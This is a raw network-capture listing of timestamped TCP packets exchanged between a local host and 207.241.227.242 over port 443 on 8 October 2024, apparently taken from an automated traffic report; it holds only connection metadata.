                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.724869967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.724889040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725030899 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725646973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725692034 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725725889 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725735903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.725758076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.739622116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756052017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756097078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756166935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756175995 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756290913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.756350040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.758822918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.758879900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.758900881 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.758910894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.758972883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.760715961 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.760749102 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.760788918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.760797024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.760811090 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.761768103 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.761805058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.761859894 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.761859894 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.761872053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.762123108 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.762147903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.762201071 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.762201071 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.762208939 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.768260002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.768302917 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.768341064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.768352032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.768368006 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.811199903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.811239004 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.811300039 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.811310053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.811328888 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.813360929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.813401937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.813435078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.813441992 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.813523054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.843147039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.843189955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.843256950 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.843256950 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.843275070 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.846173048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.846215010 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.846265078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.846265078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.846272945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.848782063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.848817110 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.848893881 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.848900080 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849025011 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849237919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849281073 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849303007 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849308968 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849342108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849467039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849497080 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849546909 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849553108 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.849627972 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.855547905 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.855588913 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.855622053 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.855628967 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.855643034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.898180962 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.898238897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.898329973 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.898329973 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.898346901 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900288105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900336981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900388956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900388956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900388956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.900398970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930249929 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930289984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930372953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930372953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930383921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.930411100 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.932892084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.932934999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.933068991 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.933068991 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.933078051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.933111906 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.934967995 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.934998989 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935049057 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935049057 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935058117 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935870886 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935905933 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935967922 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935967922 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.935976982 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.936131001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.936145067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.936216116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.936216116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.936223030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.942598104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.942652941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.943074942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.943074942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.943084002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.985131979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.985173941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.985275984 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.985286951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.985483885 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.987102032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.987143040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.987175941 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.987183094 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:56.987205029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017056942 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017093897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017173052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017173052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017173052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.017182112 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.020114899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.020157099 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.020211935 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.020212889 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.020222902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021807909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021837950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021897078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021897078 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021905899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.021934032 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.022710085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.022752047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.022871017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.022871017 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.022880077 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.023045063 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.023070097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.023156881 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.023156881 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.023164034 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029670000 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029716969 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029784918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029784918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029784918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.029793978 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.072743893 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.072793007 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.072882891 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.072892904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.072972059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.074675083 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.074717999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.074754000 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.074771881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.074794054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.079123974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.103959084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.103998899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.104145050 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.104154110 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.104243994 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.106947899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.106987953 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.107023001 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.107040882 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.107049942 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109579086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109613895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109661102 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109661102 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.109668970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111193895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111237049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111310959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111310959 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111318111 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111341953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111531973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111560106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111594915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111602068 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.111649990 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.112402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117022038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117059946 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117099047 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117105007 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.117183924 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164510965 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164556980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164675951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164702892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164710999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164722919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.164814949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191643953 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191684008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191756964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191756964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.191766977 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194000006 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194039106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194066048 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194073915 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194087029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.194550991 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196609974 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196647882 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196685076 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196686029 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196693897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.196717024 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199069023 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199129105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199245930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199245930 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199254990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199362993 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199440956 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199460983 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199467897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199656963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.199656963 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.203979969 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.204015970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.204091072 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.204091072 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.204098940 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.204124928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254400015 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254442930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254508972 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254537106 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254553080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254553080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254734039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254760981 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254793882 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254815102 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254822969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.254822969 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.281872988 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.281919003 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.281953096 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.281979084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.282066107 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.282066107 CEST49166443192.168.2.22207.241.227.242
